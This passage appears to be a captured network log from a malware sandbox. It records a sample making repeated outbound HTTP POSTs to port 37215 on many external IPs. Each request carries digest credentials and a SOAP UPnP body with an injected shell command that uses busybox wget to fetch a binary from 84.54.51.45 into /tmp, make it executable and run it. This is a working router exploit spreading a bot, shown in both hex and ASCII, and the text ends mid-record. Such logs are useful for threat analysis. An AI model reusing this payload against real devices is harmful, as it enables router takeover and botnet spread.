                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            842192.168.2.155755041.63.255.14037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741595984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            843192.168.2.154260641.139.45.14037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741625071 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            844192.168.2.154338041.119.25.3237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741647005 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            845192.168.2.153715641.1.0.837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741698027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            846192.168.2.153848441.39.119.11737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741704941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            847192.168.2.155384041.160.247.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741724014 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            848192.168.2.155718641.18.146.23837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741750002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            849192.168.2.155913641.66.47.22937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741780996 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            850192.168.2.153614641.191.126.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741805077 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            851192.168.2.155012041.177.130.9037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.741830111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 